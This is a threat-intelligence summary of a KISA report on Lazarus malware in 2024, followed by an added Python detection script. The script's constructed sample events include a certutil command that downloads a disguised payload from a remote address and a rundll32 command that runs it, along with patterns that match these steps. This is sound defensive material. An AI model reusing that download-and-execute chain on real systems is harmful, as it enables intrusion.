Characteristics of Lazarus Malware in 2024 (original title: 2024년 라자루스 악성코드 특징)
2025-01-24 • KRCERT
https://krcert.or.kr/kr/bbs/view.do?bbsId=B0000127&pageIndex=1&nttId=71642&menuNo=205021
KISA analyzes four malware types attributed to Lazarus activity observed in 2024 incidents affecting South Korean private-sector organizations, including IT companies and a major media company. The first type uses DLL side-loading, MachineGuid-based CRC32 checks, AES-128 and RC6 decryption, encrypted configuration files, and a multi-threaded remote-control component that communicates with command-and-control servers over POST requests. Another case involved hands-on attacker activity using certutil.exe to download a disguised payload and rundll32.exe to execute it, showing Living-off-the-Land tradecraft around a packed, Base64-encoded loader. KISA also details SCOUT downloader variants hidden in registry data or specific file paths, with RC4-protected configuration and window-message-based execution, and notes a separate malware type abusing NTFS Alternate Data Streams. The findings matter because they show Lazarus continuing to use modular loaders, victim-specific execution checks, stealthy storage, and remote-control tooling in domestic intrusions aimed at sensitive information theft.
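Two of the behaviours summarised above, certutil.exe fetching a disguised payload and rundll32.exe then executing it, leave a recognisable pair of process-creation events that a detection pipeline can correlate per host. The Python below is an added illustration, not code from KISA or from the report: the event records, hostnames, file paths and the 203.0.113.10 address are constructed sample data, and the 30-minute correlation window is an assumed tuning value.

```python
import re
from datetime import datetime, timedelta

# Constructed Sysmon-style process-creation events (simplified fields); not taken from the report.
EVENTS = [
    {"ts": "2024-05-02T09:14:02", "host": "WS-07", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.10/update.png C:\Users\Public\update.png"},
    {"ts": "2024-05-02T09:15:01", "host": "WS-07", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\Public\update.dll,Start"},
    {"ts": "2024-05-02T10:00:00", "host": "WS-12", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -verify C:\temp\cert.cer"},                 # benign certutil use
    {"ts": "2024-05-02T11:30:00", "host": "WS-12", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL"},              # benign rundll32, system DLL
]

URL_RE = re.compile(r"https?://", re.I)
# Directories an unprivileged user can write to; a DLL loaded from here by rundll32 deserves a look.
USER_WRITABLE_RE = re.compile(r"\\(Users|ProgramData|Temp|AppData)\\", re.I)

def is_certutil_download(ev):
    """certutil.exe used to fetch a remote file (-urlcache/-split plus a URL) rather than manage certs."""
    return ev["image"].lower().endswith("certutil.exe") and bool(
        re.search(r"-(urlcache|split)\b", ev["cmdline"], re.I) and URL_RE.search(ev["cmdline"]))

def is_suspicious_rundll32(ev):
    """rundll32.exe executing a DLL from a user-writable path instead of a system directory."""
    return ev["image"].lower().endswith("rundll32.exe") and bool(USER_WRITABLE_RE.search(ev["cmdline"]))

def correlate(events, window_minutes=30):
    """Pair each certutil download with a later suspicious rundll32 launch on the same host
    inside the time window (assumed default: 30 minutes). Returns one alert per matched pair."""
    alerts, downloads = [], {}
    for ev in sorted(events, key=lambda e: e["ts"]):          # ISO timestamps sort lexicographically
        t = datetime.fromisoformat(ev["ts"])
        if is_certutil_download(ev):
            downloads.setdefault(ev["host"], []).append(t)
        elif is_suspicious_rundll32(ev):
            for dl in downloads.get(ev["host"], []):
                if timedelta(0) <= t - dl <= timedelta(minutes=window_minutes):
                    alerts.append({"host": ev["host"], "download_at": dl.isoformat(),
                                   "exec_at": ev["ts"], "cmdline": ev["cmdline"]})
                    break
    return alerts

if __name__ == "__main__":
    for a in correlate(EVENTS):
        print(f"[LOLBin chain] {a['host']}: certutil download {a['download_at']} "
              f"-> rundll32 {a['exec_at']}: {a['cmdline']}")
```

Only the WS-07 pair is reported; the certificate verification and the system-DLL rundll32 call on WS-12 are left alone, which is the false-positive behaviour a practitioner would want before deploying a rule like this against real telemetry.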